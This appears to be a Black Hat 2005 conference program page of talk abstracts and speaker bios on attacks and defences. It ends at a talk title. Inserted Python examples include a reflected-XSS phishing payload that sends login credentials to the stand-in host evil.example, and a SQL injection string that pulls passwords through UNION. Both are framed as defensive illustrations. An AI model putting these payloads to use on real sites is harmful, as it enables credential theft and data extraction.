U.S National Security, Individual and Corporate Information Security, and Information Security Providers
Bryan Cunningham, Principal, Morgan & Cunningham, Former Deputy Legal Adviser to the White House National Security Council, Founding Co-Chair of American Bar Association’s Cybersecurity and Privacy Task Force. 
C. Forrest Morgan, Principal, Morgan & Cunningham

This presentation, by a former Deputy Legal Adviser to the White House National Security Council, and author of a chapter on legal issues in the forthcoming “Case Studies for Implementing the NSA IEM,” will provide information security consultants and information technology providers alike with insights into: how emerging United States national security and cybersecurity policies and initiatives could impact the work of consultants and technology providers; emerging standards of potential legal and regulatory liability for such consultants and providers; and strategies for mitigating risk and protecting proprietary and vulnerabilities information.

Bryan Cunningham has extensive experience as a cybersecurity and intelligence expert, both in senior U.S. Government posts and the private sector.  Cunningham, now a corporate information and homeland security consultant and principal at the Denver law firm of Morgan & Cunningham LLC, most recently served as Deputy Legal Adviser to National Security Advisor Condoleezza Rice. At the White House, Cunningham drafted key portions of the Homeland Security Act, and was deeply involved in the formation of the National Strategy to Secure Cyberspace, as well as numerous Presidential Directives and regulations relating to cybersecurity. He is a former senior CIA Officer and federal prosecutor, founding co-chair of the ABA CyberSecurity Privacy Task Force, and, in January 2005, was awarded the National Intelligence Medal of Achievement for his work on information issues. Cunningham holds a Top Secret Security Clearance and counsels corporations on information security programs, as well as information security consultants on how to structure and conduct their assessments and remediation to mitigate potential liability.

C. Forrest Morgan (JD (1987), Trained in NSA IAM) has extensive experience in corporate practice and structure including contracting, corporate formation, and operations. Mr. Morgan advises information security consultants on drafting and negotiating contracts with their customers to best protect them against potential legal liability. Mr. Morgan's practice also has emphasized commercial contract drafting and reorganization, and corporate litigation, providing in-depth understanding of the business and legal environment. He has represented both national corporations and regional firms in state and federal courts and administrative agencies in matters of litigation, creditors' rights, bankruptcy, administrative law and employment issues. Mr. Morgan served as the Regional Editor of the Colorado Bankruptcy Court Reporter from 1989 to 1992, and he co-authored the Bankruptcy section of the Annual Survey of Colorado from 1991 to 1997. As a Principal of the Denver law firm of Morgan & Cunningham, LLC, Mr. Morgan's practice also includes corporate information and security consulting. He counsels corporations on information security programs, including development of corporate policies and procedures to minimize business risks and litigation exposure.


iSCSI Security (Insecure SCSI)
Himanshu Dwivedi, Principal Partner, Information Security Partners

Himanshu Dwivedi's presentation will discuss the severe security issues that exist in the default implementations of iSCSI storage networks/products. The presentation will cover iSCSI storage as it pertains to the basic principles of security, including enumeration, authentication, authorization, and availability. The presentation will contain a short overview of iSCSI for security architects and basic security principles for storage administrators. The presentation will continue into a deep discussion of iSCSI attacks that are capable of compromising large volumes of data from iSCSI storage products/networks. The iSCSI attacks section will also show how simple attacks can make the storage network unavailable, creating a devastating problem for networks, servers, and applications. The presenter will also follow up each discussion of iSCSI attacks with a demonstration of large data compromise. iSCSI attacks will show how a large volume of data can be compromised or simply made unavailable for long periods of time without a single root or administrator password. The presentation will conclude with existing solutions from responsible vendors that can protect iSCSI storage networks/products. Each iSCSI attack/defense described by the presenter will contain deep discussions and visual demonstrations, which will allow the audience to fully understand the security issues with iSCSI as well as the standard defenses.

Himanshu Dwivedi is a founding partner of iSEC Partners, LLC, a strategic security organization. Himanshu has 11 years experience in security and information technology. Before forming iSEC, Himanshu was the Technical Director for @stake's bay area practice, the leading provider for digital security services. His professional experience includes application programming, infrastructure security, secure product design, and is highlighted with deep research and testing on storage security for the past 5 years.

Himanshu has focused his security experience towards storage security, specializing in SAN and NAS security. His research includes iSCSI and Fibre Channel (FC) Storage Area Networks as well as IP Network Attached Storage.  Himanshu has given numerous presentations and workshops regarding the security in SAN and NAS networks, including conferences such as BlackHat 2004, BlackHat 2003, Storage Networking World, Storage World Conference, TechTarget, the Fibre Channel Conference, SAN-West, SAN-East, SNIA Security Summit, Syscan 2004, and Bellua 2005. 

Himanshu currently has a patent pending on a storage design architecture that he co-developed with other @stake professionals. The patent is for a storage security design that can be implemented on enterprise storage products deployed in Fibre Channel storage networks. Additionally, Himanshu has published three books, including "The Complete Storage Reference" – Chapter 25 Security Considerations (McGraw-Hill/Osborne), "Implementing SSH" (Wiley Publishing), and "Securing Storage" (Addison Wesley Publishing), which is due out in the fall of 2005. Furthermore, Himanshu has also published two white papers. The first white paper Himanshu wrote is titled “Securing Intellectual Property”, which provides insight and recommendations on how to protect an organization’s network from the inside out.  Additionally, Himanshu has written a second white paper titled Storage Security, which provides the basic best practices and recommendations in order to secure a SAN or a NAS storage network.


Building Self-Defending Web Applications: Secrets of Session Hacking and Protecting Software Sessions
Arian J. Evans, Senior Security Engineer, Fishnet Security
Daniel Thompson, Lead Interface Developer, Secure Passage

Web applications are constantly under attack, and must defend themselves. Sadly, today, most cannot.

There are several key elements to building self-defending software but only a few are focused on today, including input validation, output encoding, and error handling. Strong Session Handling and effective Authorization mechanisms are almost completely ignored in web application software development. Many of the threats are well known, but the techniques for building applications that can defend themselves against the known threat landscape are still ignored due to lack of documentation, lack of sample code, and lack of awareness of the threats and attack methods.

This ignorance is dangerous: the landscape has changed. In April 2005 alone, zero-day scripted session attacks were discovered in the wild for eBay and other high-profile web applications that you use.

Session and Authorization attacks are real, mature, and increasing in frequency of use in the wild. They are also misunderstood or ignored by most of the development and web application security community.

This presentation will:

  • Summarize and categorize what State, Session, and Authorization attacks are.
  • Provide you with a simple, effective Taxonomy for understanding the threats.
  • Provide you with an entirely new understanding of Cross-Site Scripting (XSS).
  • Disclose new Session and Authorization attacks released in recent months.
  • Show you how to attack your intranet from the Internet using Your browser without You knowing.
  • Unveil the Paraegis Project which will provide free web app security code for .NET, J2EE, and Flash frameworks.
  • Paraegis will include functional code elements for DAT generation and stopping automated scanners/scripts.
  • Paraegis will show you how to reduce the attack surface of XSS from "all people all the time" to "one person one time" resulting in XSS vulnerabilities being virtually unexploitable.

The techniques presented are simple, innovative, realistically usable, and predominantly missing in today's webapp designs. The Paraegis Project will release code that will not only demonstrate this, but that you will be able to use in your applications for free.

Arian Evans has spent the last seven years pondering information security and disliking long bios. His focus has been on intrusion detection and application security.

He currently works for FishNet Security researching and developing new methodologies for evaluating the security posture of applications and databases, in addition to helping FishNet clients design, deploy, and defend their applications. Arian works with clients worldwide for FishNet Security, and has worked with the Center for Internet Security, FBI, and various client organizations on web application-related hacking incident response.

Arian contributes to the information security community in the form of vulnerability research & advisories, writing courseware and teaching classes on how to build secure web applications, and questioning everything. He frequently breaks things, and sometimes figures out how to put them back together again.

Daniel Thompson is the lead interface developer for Secure Passage, a software company specializing in network device change management. His interest in computer graphics and visual design started over fifteen years ago while searching for an efficient way to create fake documents. Currently Daniel works with Java, C# and ActionScript to create secure, dependable, distributed applications. He targets JSP, ASP.NET and the Macromedia Flash Player for delivery to the browser and Eclipse SWT and Microsoft WindowsForms for delivery to the desktop. In his spare time he works on data visualization and generative graphics, as well as the occasional game.

Dan became interested in information security when Arian Evans started reading his email.


Advance SQL Injection Detection by Join Force of Database Auditing and Anomaly Intrusion Detection
Yuan Fan, CISSP, Software Engineer, Arcsight

This topic will present the proposal/idea/work from the author's master's graduate project about effective detection of SQL Injection exploits while lowering the number of false positives. It gives a detailed analysis and examples of how database auditing could help in this case, and also presents the challenges of anomaly detection for this attack and how the author tried to solve them. Finally a correlation between the two will be presented.

Yuan Fan, CISSP, has worked in the network security area for more than 7 years. He currently works for ArcSight as a Software Engineer. He holds a Master of Computer Engineering degree from San Jose State University. The tool he is writing for his master's graduate research project related to this topic is a Java-based, multilayer anomaly intrusion detection system.


Advanced SQL Injection in Oracle Databases
Esteban Martínez Fayó, Argeniss

This presentation shows new ways to attack Oracle Databases. It is focused on SQL injection vulnerabilities and how they can be exploited using new techniques. It also explains how to see the internal PL/SQL code that is vulnerable in Oracle built-in procedures, with examples using recently discovered vulnerabilities. Buffer overflows, remote attacks using web applications and some ways to protect from these attacks will also be shown.

Esteban Martínez Fayó is a security researcher; he has discovered and helped to fix multiple security vulnerabilities in major vendor software products. He specializes in application security and is recognized as the discoverer of most of the vulnerabilities in Oracle server software.

Esteban currently works for Argeniss doing information security research and developing security related software solutions for Application Security Inc.


BlackHat Standup: “Yea I’m a Hacker…”
James C. Foster, Deputy Director of Global Security Solution Development, Computer Sciences Corporation

In a refreshingly different format, Foster cracks the audience with a twenty minute comedic dissertation of the past year in the information security industry. Performing standup, Foster will roast the year's worst companies' business mistakes, stereotypes, books, websites, Fucked Company security excerpts in addition to poking fun at those who don't have the dream job, boatloads of cash, the supermodel girlfriend, or cabana boy – boyfriend with humorous hints of how to get there. Wrapping up the session, Foster will make his 2006 security predictions.

James C. Foster, Fellow, is the Deputy Director of Global Security Solution Development for Computer Sciences Corporation. Foster is responsible for directing and managing the vision, technology, and operational design for CSC's global security services. Prior to joining CSC, Foster was the Director of Research and Development for Foundstone Inc (acquired by McAfee), and was responsible for all aspects of product, consulting, and corporate R&D initiatives. Prior to joining Foundstone, Foster was a Senior Advisor and Research Scientist with Guardent Inc (acquired by Verisign) and an editor at Information Security Magazine (acquired by TechTarget Media), subsequent to working as an Information Security and Research Specialist for the Department of Defense. Foster's core competencies include high-tech management, international software development and expansion, web-based application security, cryptography, protocol analysis, and search algorithm technology. Foster has conducted numerous code reviews for commercial OS components, Win32 application assessments, and reviews on commercial and government cryptography implementations.

Foster is a seasoned speaker and has presented throughout North America at conferences, technology forums, security summits, and research symposiums with highlights at the Microsoft Security Summit, BlackHat, MIT Wireless Research Forum, SANS, MilCon, TechGov, InfoSec World 2001, and the Thomson Security Conference. He also is commonly asked to comment on pertinent security issues and has been cited in USAToday, Information Security Magazine, Baseline, Computer World, Secure Computing, and the MIT Technologist. Foster holds degrees in Business Administration, Software Engineering, and Management of Information Systems and has attended the Yale School of Business, Harvard University, the University of Maryland, and is currently a Fellow at University of Pennsylvania's Wharton School of Business.

Foster is also a well published author with multiple commercial and educational papers; and has authored, contributed, or edited for major publications to include Snort 2.0, Snort 2.1 2nd Edition, Hacking Exposed 4th Ed and 5th Edition, Special Ops Security, Anti-Hacker Toolkit 2nd Ed, Advanced Intrusion Detection, Hacking the Code, Anti-Spam Toolkit, Programmer's Ultimate Security DeskRef, Google for Penetration Testers, Buffer Overflow Attacks, and Sockets/Porting/and Shellcode.


Catch Me If You Can: Exploiting Encase, Microsoft, Computer Associates, and the rest of the bunch…
James C. Foster, Deputy Director of Global Security Solution Development, Computer Sciences Corporation
Vincent T. Liu, Security Specialist

Don’t get caught.

Building off of Foster’s log manipulation and bypassing forensics session at BlackHat Windows 2004, James C. Foster and Vincent T. Liu will share over eighteen months of continued private forensic research with the Black Hat audience including ground-breaking vulnerabilities and key weaknesses in some of the most popular tools used by forensic examiners including EnCase, CA eTrustAudit, and Microsoft ISA Server. Watch live demonstrations as Foster and Vinnie detail how to leverage these weaknesses to avoid being detected, and discover the theory and practice behind the most effective and cutting-edge anti-forensics techniques. Finally, learn how to turn a forensic analyst’s training against himself by joining the speakers in a lively discussion of the “Top 10 Ways to Exploit a Forensic Examiner”.

This talk should be required viewing for all those on both sides of the fence, so come prepared to watch trusted forensics tools crumble.

James C. Foster, Fellow, is the Deputy Director of Global Security Solution Development for Computer Sciences Corporation. Foster is responsible for directing and managing the vision, technology, and operational design for CSC's global security services. Prior to joining CSC, Foster was the Director of Research and Development for Foundstone Inc (acquired by McAfee), and was responsible for all aspects of product, consulting, and corporate R&D initiatives. Prior to joining Foundstone, Foster was a Senior Advisor and Research Scientist with Guardent Inc (acquired by Verisign) and an editor at Information Security Magazine (acquired by TechTarget Media), subsequent to working as an Information Security and Research Specialist for the Department of Defense. Foster's core competencies include high-tech management, international software development and expansion, web-based application security, cryptography, protocol analysis, and search algorithm technology. Foster has conducted numerous code reviews for commercial OS components, Win32 application assessments, and reviews on commercial and government cryptography implementations.

Foster is a seasoned speaker and has presented throughout North America at conferences, technology forums, security summits, and research symposiums with highlights at the Microsoft Security Summit, BlackHat, MIT Wireless Research Forum, SANS, MilCon, TechGov, InfoSec World 2001, and the Thomson Security Conference. He also is commonly asked to comment on pertinent security issues and has been cited in USAToday, Information Security Magazine, Baseline, Computer World, Secure Computing, and the MIT Technologist. Foster holds degrees in Business Administration, Software Engineering, and Management of Information Systems and has attended the Yale School of Business, Harvard University, the University of Maryland, and is currently a Fellow at University of Pennsylvania's Wharton School of Business.

Foster is also a well published author with multiple commercial and educational papers; and has authored, contributed, or edited for major publications to include "Snort 2.0", "Snort 2.1" 2nd Edition, "Hacking Exposed" 4th Ed and 5th Ed, "Special Ops Security", "Anti-Hacker Toolkit" 2nd Ed, "Advanced Intrusion Detection", "Hacking the Code", "Anti-Spam Toolkit", "Programmer's Ultimate Security DeskRef", "Google for Penetration Testers", "Buffer Overflow Attacks", and "Sockets, Shellcode, Porting, and Coding".

Vincent Liu is an IT security specialist at a Fortune 100 company where he is responsible for assessing the security of the enterprise network infrastructure and participating as a member of the global incident response team. Before moving to his current position, Vincent worked as a consultant with the Ernst & Young Advanced Security Center and as an analyst at the National Security Agency. His specialties include penetration testing, web application assessments, incident response, binary reverse engineering, and exploit development.

Vincent holds a degree in Computer Science and Engineering from the University of Pennsylvania. While at Penn, Vincent taught courses on operating system implementation and C programming, and was involved with DARPA-funded research into advanced intrusion detection techniques. He is currently a contributor to the Metasploit project, and is a contributing author for Sockets, Shellcode, Porting, and Coding. Vincent has also studied at the University of Maryland and the University of Kentucky.


Hacking in a Foreign Language: A Network Security Guide to Russia (and Beyond)
Kenneth Geers

Has your network ever been hacked, and all you have to show for your investigative efforts is an IP address belonging to an ISP in Irkutsk? Are you tired of receiving e-mails from Citibank that resolve to Muscovite IP addresses?  Would you like to hack the Kremlin? Or do you think that the Kremlin has probably owned you first? Maybe you just think that Anna Kournikova is hot.  If the answer to any of the above questions is yes, then you need an introduction to the Gulag Archipelago of the Internet, the Cyberia of interconnected networks, Russia.

Do not let the persistent challenges of crossing international boundaries intimidate you any longer. In this briefing, we will follow several real-world scenarios back to Russia, and you will learn valuable strategies for taking your investigations and operations one big geographical step further.  A brief introduction to Russia will be followed by 1,000 traceroutes over the frozen tundra described in detail, along with an explanation of the relationship between cyber and terrestrial geography. Information will be provided on Russian hacker groups and law enforcement personnel, as well as a personal interview with the top Russian cyber cop, conducted in Russian and translated for this briefing.

Quick: name one significant advantage that Russian hackers have over you.  They can read your language, but you cannot read theirs! Since most Westerners cannot read Russian, the secrets of Russian hacking are largely unknown to Westerners. You will receive a short primer on the Russian language, to include network security terminology, software translation tools, and cross-cultural social engineering faux-pas (this method will apply to cracking other foreign languages as well).

Hacking in a Foreign Language details a four-step plan for crossing international frontiers in cyberspace. First, you must learn something about the Tribe: in this case, the chess players and the cosmonauts. Second, you must study their cyber Terrain. We will examine the open source information and then try to create our own network map using traceroutes. Third, we will look at the Techniques that the adversary employs. And fourth, we will conquer Translation. The goal is to level the playing field for those who do not speak a foreign language. This briefing paves the way for amateur and professional hackers to move beyond their lonely linguistic and cultural orbit in order to do battle on far-away Internet terrain.

Kenneth Geers (M.A., University of Washington, 1997) is an accomplished computer security expert and Russian linguist. His career includes many years working as a translator, programmer, website developer and analyst. The oddest job he has had was working on the John F. Kennedy Assassination Review Board (don't ask). He also waited tables in Luxembourg, harvested flowers in the Middle East, climbed Mount Kilimanjaro, was bitten by a deadly bug in Zanzibar and made Trappist beer at 3 AM in the Rochefort monastery. He loves to read computer logfiles. In his free time, he plays chess and serves as a SANS mentor. He loves Russia, his wife Jeanne, and daughters Isabelle and Sophie. Kenneth drinks beer and feeds the empty cans to camels.

Return to the top of the page

Can You Really Trust Hardware? Exploring Security Problems in Hardware Devices
Joe Grand, President & CEO, Grand Idea Studio, Inc.

Most users treat a hardware solution as an inherently trusted black box. "If it's hardware, it must be secure," they say. This presentation explores a number of classic security problems with hardware products, including access to stored data, privilege escalation, spoofing, and man-in-the-middle attacks. We explore technologies commonly used in the network and computer security industries including access control, authentication tokens, and network appliances. You'll leave this presentation knowing the consequence of blindly trusting hardware.

Joe Grand is the President of Grand Idea Studio, a San Diego-based product development and intellectual property licensing firm, where he specializes in embedded system design, computer security research, and inventing new concepts and technologies. Joe has testified before the United States Senate Governmental Affairs Committee and is a former member of the legendary hacker collective L0pht Heavy Industries. He is the author of "Hardware Hacking: Have Fun While Voiding Your Warranty" and a co-author of "Stealing The Network: How to Own A Continent". Joe holds a Bachelor of Science degree in Computer Engineering from Boston University.

Return to the top of the page

Top Ten Legal Issues in Computer Security
Jennifer Stisa Granick, Executive Director, Center For Internet and Society, Stanford Law School

This will be a practical and theoretical tutorial on legal issues related to computer security practices. In advance of the talk, I will unscientifically determine the “Top Ten Legal Questions About Computer Security” that Black Hat attendees have and will answer them as clearly as the unsettled nature of the law allows. While the content of the talk is audience driven, I expect to cover legal issues related to strike-back technology, vulnerability disclosure, civil and criminal liability for maintaining insecure computer systems, reverse engineering, the Digital Millennium Copyright Act, trade secret law and licensing agreements.

Jennifer Stisa Granick joined Stanford Law School in January 2001, as Lecturer in Law and Executive Director of the Center for Internet and Society (CIS). She teaches, speaks and writes on the full spectrum of Internet law issues including computer crime and security, national security, constitutional rights, and electronic surveillance, areas in which her expertise is recognized nationally.

Granick came to Stanford after almost a decade practicing criminal defense law in California. Her experience includes stints at the Office of the State Public Defender and at a number of criminal defense boutiques, before founding the Law Offices of Jennifer S. Granick, where she focused on hacker defense and other computer law representations at the trial and appellate level in state and federal court. At Stanford, she currently teaches the Cyberlaw Clinic, one of the nation's few public interest law and technology litigation clinics.

Granick continues to consult on computer crime cases and serves on the Board of Directors of the Honeynet Project, which collects data on computer intrusions for the purposes of developing defensive tools and practices and the Hacker Foundation, a research and service organization promoting the creative use of technological resources. She was selected by Information Security magazine in 2003 as one of 20 "Women of Vision" in the computer security field. She earned her law degree from University of California, Hastings College of the Law and her undergraduate degree from the New College of the University of South Florida.

Return to the top of the page

Phishing with Super Bait
Jeremiah Grossman, CTO and co-founder, WhiteHat Security

The use of phishing/cross-site scripting hybrid attacks for financial gain is spreading. It’s imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information.

This isn’t just another presentation about phishing scams or cross-site scripting. We’re all very familiar with each of those issues. Instead, we’ll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help.

By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We’ll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript.  And, we’ll give you the steps you need to take to protect your websites from these attacks.  
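The mechanism the abstract describes, as an added illustration that is not the presenter's code: a login page on a hypothetical legitimate site (bank.example) reflects a query parameter into the HTML unescaped, so a crafted link on the real host, served over the real site's TLS certificate, renders an attacker-supplied login form that posts credentials to evil.example. The hardened variant HTML-encodes the parameter, and a small parser-based check reports any form on the rendered page whose action points off-site, which is the kind of test a site owner can run over their own responses. All hosts, URLs and the payload are constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

SITE = "https://bank.example"   # hypothetical legitimate site; this is what the victim sees in the URL bar

LOGIN_FORM = ("<form action='/login' method='post'>"
              "<input name='user'><input name='pass' type='password'></form>")


def render_vulnerable(query):
    """Login page that reflects ?msg= verbatim into the HTML: a reflected XSS hole."""
    msg = parse_qs(query).get("msg", [""])[0]
    return f"<html><body><h1>Bank Login</h1><p>{msg}</p>{LOGIN_FORM}</body></html>"


def render_fixed(query):
    """Same page, with the parameter HTML-encoded before it is echoed."""
    msg = parse_qs(query).get("msg", [""])[0]
    return f"<html><body><h1>Bank Login</h1><p>{html.escape(msg, quote=True)}</p>{LOGIN_FORM}</body></html>"


# Constructed attacker payload: a second login form that the real site will serve, but which
# submits the credentials to the attacker's host.
PAYLOAD = ("<form action='https://evil.example/grab' method='post'>"
           "Session expired, please sign in again:"
           "<input name='user'><input name='pass' type='password'><input type='submit'></form>")
PHISHING_URL = f"{SITE}/login?msg={quote(PAYLOAD)}"


class _FormActions(HTMLParser):
    """Collects the action attribute of every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action", ""))


def offsite_form_actions(page, site=SITE):
    """Return the actions of any forms on `page` that would submit to a host other than `site`."""
    p = _FormActions()
    p.feed(page)
    host = urlsplit(site).netloc
    return [a for a in p.actions if urlsplit(a).netloc not in ("", host)]


def query_of(url):
    """The query string part of a URL, as the server would receive it."""
    return urlsplit(url).query


if __name__ == "__main__":
    q = query_of(PHISHING_URL)
    print("vulnerable page posts to:", offsite_form_actions(render_vulnerable(q)))
    print("fixed page posts to:     ", offsite_form_actions(render_fixed(q)))
```

The off-site check only catches the form-based variant; the same hole lets injected script read the page, rewrite the existing form's action, or forward keystrokes, none of which shows up as a foreign form action, so output encoding at the point of reflection is the fix, and the check is a regression test rather than a defence.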

Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security, where he is responsible for web application security R&D and industry evangelism. As a seven-year industry veteran and well-known security expert, Mr. Grossman is a frequent conference speaker at the BlackHat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writings, and discoveries have been featured in USA Today, VAR Business, NBC, ZDNet, eWeek, BetaNews, etc.  Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites.

Return to the top of the page

The Art of Defiling: Defeating Forensic Analysis
the Grugq

The Grugq has been at the forefront of forensic research for the last six years, during which he has been pioneering in the realm of anti-forensic research and development. During this time, he has also worked with a leading IT security consultancy and been employed at a major financial institution. Most recently he has been involved with an innovative security software development start-up company. Currently the Grugq is a freelance forensic and IT security consultant. While not on engagements, the Grugq continues his research on security, forensics and beer.

Return to the top of the page

Stopping Injection Attacks with Computational Theory
Robert J. Hansen
Meredith L. Patterson

Input validation is an important part of security, but it's also one of the most annoying parts. False positives and false negatives force us to choose between convenience and security—but do we have to make that choice? Can't we have both? In this talk two University of Iowa researchers will present new methods of input validation which hold promise to give us both convenience _and_ security. A basic understanding of SQL and regular expressions is required.
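An added example of the trade-off the abstract names, written for this page and not the speakers' own method: a regex blacklist rejects the legitimate name O'Brien (false positive) while passing a UNION clause in a numeric context (false negative), whereas a check that compares the token structure of the final statement against the structure the application intended accepts any input that stays a single literal and rejects anything that adds tokens. The tokenizer, the query builders (deliberately vulnerable, raw interpolation) and the blacklist are all constructed for the example.

```python
import re

# Toy SQL tokenizer, just enough to compare the structure of two statements.
TOKEN = re.compile(r"""
      (?P<ws>\s+)
    | (?P<comment>--[^\n]*|/\*.*?\*/)
    | (?P<string>'(?:[^']|'')*')
    | (?P<number>\d+(?:\.\d+)?)
    | (?P<ident>[A-Za-z_][A-Za-z0-9_]*)
    | (?P<op><=|>=|<>|!=|[=<>+\-*/,();.])
    | (?P<bad>.)
""", re.S | re.X)

KEYWORDS = {"select", "from", "where", "and", "or", "not", "union",
            "insert", "update", "delete", "drop", "like", "in"}


def shape(sql):
    """Token kinds of a statement, with keywords spelled out; the contents of literals are ignored."""
    out = []
    for m in TOKEN.finditer(sql):
        kind = m.lastgroup
        if kind == "ws":
            continue
        if kind == "ident" and m.group().lower() in KEYWORDS:
            out.append(m.group().upper())
        else:
            out.append(kind)
    return out


def same_shape(expected, sql):
    """Structural check: does the final statement still parse to the shape the application intended?"""
    return shape(sql) == expected


# The usual pattern filter: anything that looks like an attack is rejected.
BLACKLIST = re.compile(r"'|--|;|\bor\b", re.I)


def regex_blacklist_blocks(value):
    return BLACKLIST.search(value) is not None


def sql_escape(value):
    """Standard SQL string escaping: double every single quote."""
    return value.replace("'", "''")


# Deliberately vulnerable query builders (raw interpolation), kept that way so the check has work to do.
def build_name_query(name):
    return f"SELECT * FROM users WHERE name = '{name}'"


def build_id_query(user_id):
    return f"SELECT * FROM users WHERE id = {user_id}"   # numeric context: no quotes involved at all


# Expected shapes, computed once from harmless placeholder values.
NAME_SHAPE = shape(build_name_query("placeholder"))
ID_SHAPE = shape(build_id_query("1"))


if __name__ == "__main__":
    for name in ("O'Brien", "x' OR '1'='1"):
        print(repr(name), "blacklist blocks:", regex_blacklist_blocks(name),
              "escaped stays one literal:", same_shape(NAME_SHAPE, build_name_query(sql_escape(name))))
    inj = "1 UNION SELECT password FROM users"
    print(repr(inj), "blacklist blocks:", regex_blacklist_blocks(inj),
          "shape intact:", same_shape(ID_SHAPE, build_id_query(inj)))
```

The structural comparison is a safety net for code that builds statements as strings; parameterized queries make the question moot because the value never reaches the SQL parser as text.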

Robert J. Hansen: B.A. in Computer Science from Cornell College, 1998. Graduate student at the University of Iowa, 2003-2005, researching secure voting systems with Prof. Doug Jones. Senior Security Engineer at Exemplary Technologies, 2000; Cryptographic Engineer at PGP Security, 2000-2001.

Meredith L. Patterson: B.A. English (Linguistics) from the University of Houston, 2000. M.A. Linguistics from the University of Iowa, 2003. Graduate student at the University of Iowa, 2003-2005, studying data mining with Prof. Hwanjo Yu. Bioinformatics intern at Integrated DNA Technologies, 2003-2005.

Return to the top of the page

GEN III Honeynets: The birth of roo
Allen Harper, Security Engineer, DoD
Edward Balas, Security Researcher, Advanced Network Management Laboratory, Indiana University

A honeypot is an information gathering system, designed for attackers to interact with. A honeynet, simply put, is a network of honeypots. The key component of a honeynet is the honeywall. The honeywall is used to provide the following capabilities:

  • Data Capture. The ability to collect information about the attack.
  • Data Control. The ability to restrict the amount of damage that can be done from one of your honeypots to another network.
  • Data Analysis. The ability to conduct limited forensic analysis on the network traffic or compromised honeypots in order to discover the attacker's methodology.
  • Data Alerting. The ability to alert an analyst as to suspicious activity.

In 2001, the Honeynet Project released a honeywall, called eeyore, which allowed for Gen II honeynets and improved both Data Capture and Data Control capabilities over the Gen I honeynets.

In the summer of 2005, the Honeynet Project released a new honeywall, called roo, which enables Gen III honeynets. The new roo has many improvements over eeyore:

  • Improved installation, operation, customization
  • Improved data capture capability by introducing a new hflow database schema and pcap-api for manipulating packet captures.
  • Improved data analysis capability by introducing a new web based analysis tool called walleye.
  • Improved user interfaces and online documentation

The purpose of this presentation is to describe the new capabilities of Gen III honeynets and demonstrate the new roo. In addition, a road ahead will be discussed to describe a global honeygrid of connected honeynets.

Allen Harper is a Security Engineer for the US Department of Defense in Northern Virginia. He holds an MS in Computer Science from the Naval Postgraduate School. For the Honeynet Project, Allen leads the development of the GEN III honeywall CDROM, now called roo. Allen was a co-author of Gray Hat Hacking: The Ethical Hacker's Handbook, published by McGraw-Hill, and served on the winning team (sk3wl of root) at last year's DEFCON Capture the Flag contest.

Edward Balas is a security researcher within the Advanced Network Management Laboratory at Indiana University. As a member of the Honeynet Project, Edward leads the development of Sebek and several key GenIII Honeynet data analysis components. Prior to joining Indiana University, Edward worked for several years as a network engineer developing tools to detect and manage network infrastructure problems.

Return to the top of the page

Using Causal Analysis to Establish Meaningful Connections between Anomalous Behaviors in a Networking Environment
Ken Hines, Ph.D., CTO, GraniteEdge Networks

Fueled by business needs such as supply chain integration and outsourcing, modern enterprises must open up portions of their networks to potentially untrusted outsiders. Combined with the troubling aspects of malicious insiders, ever more sophisticated attacks, increasing network complexity, and strong pressure from regulatory bodies to rapidly identify breaches and assess damages, there is a rapidly growing concern over internal network security. IT departments must work harder than ever to prevent insiders and outsiders from gaining unauthorized access to critical assets deep in the network, and if such access ever occurs, identify and report on the impact of such a security breach.

In order to gain real insight into the dynamic behavior of their networks, IT departments must monitor huge quantities of data, where individual elements of a sophisticated attack may be spread out over long periods of time, and vast numbers of logs. Many tools are available to identify individual phases of an attack, such as IDSs, network based anomaly detection tools, host based monitoring tools, and even firewalls. However, this data is presented to the security analyst as a series of unrelated suspicious events. Because of the complexity of modern networks there are always isolated and seemingly suspicious things occurring on the network. To find a sophisticated breach the individual pieces of an attack need to be tied together for successful analysis.  

One approach to determining relationships between events is by defining rules, such as: if some set of events happens around the same time, they are probably related, and should be presented as a correlated event. Unfortunately this places the burden on the security analyst of predefining attack scenarios for their particular network. Unlike virus detection which can leverage the entire anti-virus community to identify and write appropriate signature files, internal network security has no such analogy. Every enterprise network has unique characteristics requiring company specific rules. While rules are good for identifying problems with well defined signatures, they aren’t capable of relating attack elements separated by large time intervals, and obscured by benign activity on the surrounding hosts. The missing piece is causal analysis, which can automatically link together suspicious events independent of the normal network activity that occurs between the various phases of a security breach. The benefit of the causal analysis approach is that chains of related and suspicious activity provide a strategic overview of network behavior allowing a security analyst to focus their efforts on attacks in progress. When they have a readable chain of anomalous behavior, the security team can trace the attack vector back to the entry point, and find the so-called “patient zero.”

This presentation demonstrates the value of causal analysis using a simple example that involves social networks rather than computer networks, how this example is really a metaphor for a very common form of computer network attack, and how causal analysis is equally appropriate in finding this sort of attack in enterprise networks. It then presents some of the factors that compound the difficulty of this analysis in real networks, and describes approaches that simplify this complexity. Using the techniques described, two real “stepping stone” attacks are outlined and diagrammed to illustrate the power of causal analysis. Finally, it demonstrates how this analysis can be combined with other forms of security analytic and mitigation techniques to provide a formidable barrier against network attacks.

Ken Hines earned his Ph.D. in computer science at the University of Washington in 2000, by successfully defending his dissertation, which applied causal analysis to debugging heterogeneous distributed embedded systems.  Since then, he has founded two venture funded companies, and actively developed commercial products that apply causal analysis to solving complex problems related to distributed embedded systems, network processor based network infrastructure, and finally networks as a whole. 

While a graduate student, Ken was one of the primary researchers on the Chinook Hardware/Software Co-synthesis project, and published a number of papers on distributed debugging, distributed hardware/software co-simulation, and co-synthesis for heterogeneous distributed embedded systems.

Return to the top of the page

Remote Windows Kernel Exploitation - Step In To the Ring 0
